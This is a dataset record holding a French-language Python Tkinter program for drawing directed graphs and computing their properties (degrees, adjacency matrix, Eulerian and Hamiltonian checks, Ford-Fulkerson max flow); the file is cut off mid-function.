hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
e7ce0818904d46d11eb74c9bc1c1d5e0067a9008
68,039
py
Python
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
GraphTrace.py
a-dera/Graphe
70886565cc1dbda9f343dc11edcc480e2372934f
[ "MIT" ]
null
null
null
################################################## # Importation des Bibliotheques et fonctions: from tkinter import * from PIL import ImageGrab from tkinter import PhotoImage import tkinter as tk from tkinter import ttk from collections import defaultdict class Euler: def __init__(self,vertices): self.V= vertices #No. of vertices self.graph = defaultdict(list) # default dictionary to store graph # function to add an edge to graph def addEdge(self,u,v): # alternatives self.graph[u].append(v) self.graph[v].append(u) #A function used by isConnected def DFSUtil(self,v,visited): # Mark the current node as visited visited[v]= True #Recur for all the vertices adjacent to this vertex for i in self.graph[v]: if visited[i]==False: self.DFSUtil(i,visited) '''Method to check if all non-zero degree vertices are connected. It mainly does DFS traversal starting from node with non-zero degree''' def isConnected(self): # Mark all the vertices as not visited visited =[False]*(self.V) # Find a vertex with non-zero degree for i in range(self.V): if len(self.graph[i]) > 1: break # If there are no edges in the graph, return true if i == self.V-1: return True # Start DFS traversal from a vertex with non-zero degree self.DFSUtil(i,visited) # Check if all non-zero degree vertices are visited for i in range(self.V): if visited[i]==False and len(self.graph[i]) > 0: return False return True '''The function returns one of the following values 0 --> If grpah is not Eulerian 1 --> If graph has an Euler path (Semi-Eulerian) 2 --> If graph has an Euler Circuit (Eulerian) ''' def isEulerian(self): # Check if all non-zero degree vertices are connected if self.isConnected() == False: return 0 else: #Count vertices with odd degree odd = 0 for i in range(self.V): if len(self.graph[i]) % 2 !=0: odd +=1 '''If odd count is 2, then semi-eulerian. If odd count is 0, then eulerian If count is more than 2, then graph is not Eulerian Note that odd count can never be 1 for undirected graph''' if odd == 0: return 2 elif odd == 2: return 1 elif odd > 2: return 0 # Function to run test cases def test(self): res = self.isEulerian() if res == 0: #print ("Le graphe n'est pas eulerien") resultat="Le graphe n'est pas eulerien" return resultat elif res ==1 : #print ("Le graphe comporte un chemain eulerien") resultat="Le graphe comporte un chemain eulerien" return resultat else: #print ("Le graphe comporte un cycle eulerien") resultat="Le graphe comporte un cycle eulerien" return resultat class Hamilton(): def __init__(self, vertices): self.graph = [[0 for column in range(vertices)] for row in range(vertices)] self.V = vertices ''' Check if this vertex is an adjacent vertex of the previously added vertex and is not included in the path earlier ''' def isSafe(self, v, pos, path): # Check if current vertex and last vertex # in path are adjacent if self.graph[ path[pos-1] ][v] == 0: return False # Check if current vertex not already in path for vertex in path: if vertex == v: return False return True ############################################################# # A recursive utility function to solve # hamiltonian cycle problem def hamCycleUtil(self, path, pos): # base case: if all vertices are # included in the path if pos == self.V: # Last vertex must be adjacent to the # first vertex in path to make a cyle if self.graph[ path[pos-1] ][ path[0] ] == 1: return True else: return False # Try different vertices as a next candidate # in Hamiltonian Cycle. We don't try for 0 as # we included 0 as starting point in in hamCycle() for v in range(1,self.V): if self.isSafe(v, pos, path) == True: path[pos] = v if self.hamCycleUtil(path, pos+1) == True: return True # Remove current vertex if it doesn't # lead to a solution path[pos] = -1 return False def hamCycle(self): path = [-1] * self.V ''' Let us put vertex 0 as the first vertex in the path. If there is a Hamiltonian Cycle, then the path can be started from any point of the cycle as the graph is undirected ''' path[0] = 0 if self.hamCycleUtil(path,1) == False: #print ("Solution does not exist\n") resultat="Le graphe n'est pas hamiltonien" return resultat return self.printSolution(path) def printSolution(self, path): #print ("Solution Exists: Following is one Hamiltonian Cycle") resultat="Le graphe est hamiltonien: " for vertex in path: #print (vertex) resultat+=str(vertex)+" " #print (path[0], "\n") resultat+=str(path[0]) return resultat ########################################## class Max_flow: def __init__(self,graph): self.graph = graph # residual graph self. ROW = len(graph) #self.COL = len(gr[0]) '''Returns true if there is a path from source 's' to sink 't' in residual graph. Also fills parent[] to store the path ''' def BFS(self,s, t, parent): # Mark all the vertices as not visited visited =[False]*(self.ROW) # Create a queue for BFS queue=[] # Mark the source node as visited and enqueue it queue.append(s) visited[s] = True # Standard BFS Loop while queue: #Dequeue a vertex from queue and print it u = queue.pop(0) # Get all adjacent vertices of the dequeued vertex u # If a adjacent has not been visited, then mark it # visited and enqueue it for ind, val in enumerate(self.graph[u]): if visited[ind] == False and val > 0 : queue.append(ind) visited[ind] = True parent[ind] = u # If we reached sink in BFS starting from source, then return # true, else false return True if visited[t] else False # Returns tne maximum flow from s to t in the given graph def FordFulkerson(self, source, sink): # This array is filled by BFS and to store path parent = [-1]*(self.ROW) max_flow = 0 # There is no flow initially # Augment the flow while there is path from source to sink while self.BFS(source, sink, parent) : # Find minimum residual capacity of the edges along the # path filled by BFS. Or we can say find the maximum flow # through the path found. path_flow = float("Inf") s = sink while(s != source): path_flow = min (path_flow, self.graph[parent[s]][s]) s = parent[s] # Add path flow to overall flow max_flow += path_flow # update residual capacities of the edges and reverse edges # along the path v = sink while(v != source): u = parent[v] self.graph[u][v] -= path_flow self.graph[v][u] += path_flow v = parent[v] return max_flow ################################################################# # - Fenetre Graphe Orienter - # # /////////////////////////////////////////////// # # Description: Programme traitant sur les graphes # # Orienter # # /////////////////////////////////////////////// # class GrapheOriente(Tk): def __init__(self): Tk.__init__(self) # constructeur de la classe parente #recupere la taille de l'ecrant de l'ordinateur width=self.winfo_screenwidth() height=self.winfo_screenheight() self.largeure=900 self.hauteure=500 self.x=(width/2)-(self.largeure/2) self.y=(height/2)-(self.hauteure/2) #initialisation du canvas self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white") self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y))) self.resizable(False,False) self.wm_title('Graphe Oriente') self.graphe.pack(side =TOP, padx =5, pady =5) #evenement declancher par les clic de la sourie self.bind("<Double-Button-1>", self.sommet) self.bind("<Button-3>", self.arc) #menu de la fenetre menubar = Menu(self) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Quitter ?", command = self.destroy) filemenu.add_command(label = "Sauvegarder", command = self.save) menubar.add_cascade(label = "Fichier", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe) filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet) filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj) filemenu.add_command(label = "Successeur du sommet", command=self.successeur) filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur) filemenu.add_command(label = "Demi degre supperieur du sommet", command=self.demi_deg_sup) filemenu.add_command(label = "Demi degre inferieur du sommet", command=self.demi_deg_inf) filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton) filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler) filemenu.add_command(label = "Flow maximal", command=self.maxflow) menubar.add_cascade(label = "Traitement", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Tout effacer ?", command =self.delete) menubar.add_cascade(label = "Effacer", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Aide", command =self.aide) menubar.add_cascade(label = "Aide", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) self.config(menu = menubar) #variable globale self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() def delete(self): for element in self.graphe.find_all(): self.graphe.delete(element) self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() pass # fonction permettant de fermer la fenetre fille def Close_Toplevel (self): self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() #fenetre permettant de fermet la fenetre fille de sauvegarde def Close_Save (self,event=None): if len(self.var.get())>0: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/{}.png".format(self.var.get())) else: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/Graphe.png") self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() def aide(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,150) self.toplevel_dialog.wm_title("Aide") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=150 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() aide=""" Tracer un sommet: Double clic Tracer un arc: clic gauche sur chaque sommet """ self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold') self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction de sauvegarde du graphe dessiner def save(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Sauvegarder") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Save) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ') self.label.pack(side='left') self.var=tk.Entry(self.toplevel_dialog) self.var.pack(side='left') self.var.bind("<Return>", self.Close_Save) self.var.bind("<Escape>", self.Close_Toplevel) self.var.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save) self.yes_button.pack(side='right',fill='x',expand=True) # fonction permettant de detecter si le graphe est eulerien def euler(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe eulerien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) l=len(self.couple) lg=len(self.sommets) if lg>=2: g1 = Euler(lg) for i in range(l): g1.addEdge(self.couple[i][0],self.couple[i][1]) self.var=g1.test() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de detecter si le graphe est hamiltonien def hamilton(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe hamiltonien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) lg=len(self.couple) if lg>1: l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) k+=1 if k==0: self.matrice[i].append(0) g1 = Hamilton(l) g1.graph = self.matrice self.var=g1.hamCycle() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de connetre le flow maximal def maxflow(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,200) self.toplevel_dialog.wm_title("Flow maximal") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=200 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ') self.label.grid(row=1) self.valeur1=tk.Entry(self.toplevel_dialog) self.valeur1.grid(row=1,column=1) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ') self.label.grid(row=2) self.valeur2=tk.Entry(self.toplevel_dialog) self.valeur2.grid(row=2,column=1) self.label=tk.Label(self.toplevel_dialog, text='\n\n') self.label.grid(row=3) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow) self.yes_button.grid(row=4,column=1) self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=4,column=3) pass def Close_maxflow (self): lg=len(self.couple) if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() : l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(element[2]) k+=1 if k==0: self.matrice[i].append(0) g = Max_flow(self.matrice) src=int(self.valeur1.get()) des=int(self.valeur2.get()) self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des)) self.label.grid(row=6) else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.grid(row=6) pass def matriceAdj(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(300,300) self.toplevel_dialog.wm_title("Matrice D'adjacence") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=300 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) lg=len(self.couple) if lg>0: l=len(self.sommets) self.matrice=list() for i in range(l): resultat="" self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) resultat+="1 " k+=1 if k==0: self.matrice[i].append(0) resultat+="0 " self.label=tk.Label(self.toplevel_dialog, text=resultat) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de donner le successeur d'un sommet def successeur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Successeur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.toplevel_dialog.bind("<Return>", self.Close_suc) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_suc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc) self.yes_button.grid(row=1,column=4) pass def Close_suc(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[0]): resultat+=str(element[1])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def predeccesseur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Predecesseur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_pred) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_pred) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred) self.yes_button.grid(row=1,column=4) def Close_pred(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[1]): resultat+=str(element[0])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def demi_deg_sup(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(700,100) self.toplevel_dialog.wm_title("Demi degre supperieur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=700 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre_sup) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre_sup) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_sup) self.yes_button.grid(row=1,column=4) def Close_degre_sup(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[0]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre supperieur du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def demi_deg_inf(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(700,100) self.toplevel_dialog.wm_title("Demi degre inferieur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=700 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre_inf) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre_inf) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre_inf) self.yes_button.grid(row=1,column=4) def Close_degre_inf(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[1]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le demi degre inferieur du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def degres_sommet(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Degre du sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=5) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre) self.yes_button.grid(row=1,column=3) def Close_degre(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() in str(element): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def ordre_graphe(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,50) self.toplevel_dialog.wm_title("Ordre du graphe") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=50 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) 